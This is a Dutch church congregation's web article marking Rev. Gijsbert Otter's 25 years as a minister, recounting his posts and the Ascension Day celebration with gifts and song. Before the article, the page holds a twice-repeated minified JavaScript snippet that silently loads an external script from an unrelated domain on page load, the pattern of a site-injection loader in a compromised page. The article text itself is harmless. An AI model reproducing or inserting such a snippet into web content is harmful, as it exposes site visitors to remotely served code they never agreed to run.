;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ds. G.J. Otter 25 jaar predikant … Betrokken, integer en innemend! - PKN Damwâld

Ds. G.J. Otter 25 jaar predikant … Betrokken, integer en innemend!

Gepubliceerd op: vrijdag 27 mei 2022

Het was een zeer zonnige en fris-warme dag die 25e mei 1997, nu alweer 25 jaar geleden, toen gemeenteleden, genodigden, vrienden en bekenden op weg gingen naar de kerk. Een jongeman, geboren in 1968 te Dokkum, zou die dag bevestigd worden als predikant van de Hervormde Gemeente Nieuwe Pekela. Op 12 september 2004, wederom een zonnige en fris-warme dag met een stevig briesje, kreeg het predikantschap van die jongeman een vervolg bij de Protestantse Gemeente Emmeloord. Vele jaren later, op een zonnige, zeer warme moederdag … 13 mei 2018 … even voor drie uur, maakten leden en genodigden van Hervormd Akkerwoude c.a. zich op om de predikant op zijn nieuwe werkplek te verwelkomen …

Gijsbert Otter is inmiddels 25 jaar predikant binnen de Protestantse Kerk Nederland. ‘Staan’ is een werkwoord dat voor dominees wordt gebruikt, maar onze dominee is zeker niet blijven staan. Juist door in beweging en ontwikkeling te blijven, is deze bijzondere ambtsperiode voor hem positief gebleven. Op Hemelvaartsdag stonden we als gemeente uitgebreid stil bij het 25-jarig ambtsjubileum van ds. Gijsbert Otter en vooral om dit ook samen te vieren na een dienst waarin de hoofdrolspeler zelf voorging.

Voorzitter van de kerkenraad Sjoerd Postma tooide ds. Otter allereerst met een feestelijke puntmuts en bood vervolgens namens de gemeente ds. Otter, in een beeld van geloven en gemeente-zijn, een prachtige, stevige appelboom aan. Net als het geloof verdient een boom goede grond, voldoende verzorging, voeding en water en op z’n tijd een goede snoeibeurt. Een goede (appel-) boom levert niet voor niets heerlijke vruchten op, omdat de zon van God het elke dag verwarmt. Wie wil niet dicht bij zo’n boom leven? De boom omhakken en opbranden kan misschien wel, zeker gezien een onvermoede hobby van de jubilaris, maar omdat het zo mooi is zal niemand zich daar snel aan wagen! En ja, een heerlijk appeltje voor de dorst op de boot …?

De Bernetsjerke droeg met een prachtige bijdrage bij aan de festiviteiten en namens Gereformeerd Damwâld bood ouderling Durk Gros de jubilaris een passend geschenk aan. De gemeente zong als traktatie ds. Otter z’n favoriete lied toe … Opwekking 818: ‘Op die dag‘, een lied van hoop, een lied met toekomstperspectief. Als kers op de taart werden de kerkgangers bij de uitgang verrast op een heerlijk slagroomsoesje.

Ds. Otter sloot af met woorden van grote dankbaarheid aan de Here God. Ook sprak hij zijn grote waardering uit jegens echtgenote Hildegard. Samen hebben ze alle stappen gezet. Die waren mooi, maar niet altijd eenvoudig, wél altijd in liefde, met passie en energie, en met gevoel voor roeping.

Als kerk, als gemeente zijn we de Here God dankbaar voor de 25 afgelopen jaren waarin ds. Otter zich met hart en ziel heeft ingezet. Inspirerend, enthousiast, bevlogen, bescheiden, dicht bij zichzelf … en vooral dichtbij de Here God.

Ook voor de toekomst wensen we u samen met uw gezin Gods zegen toe!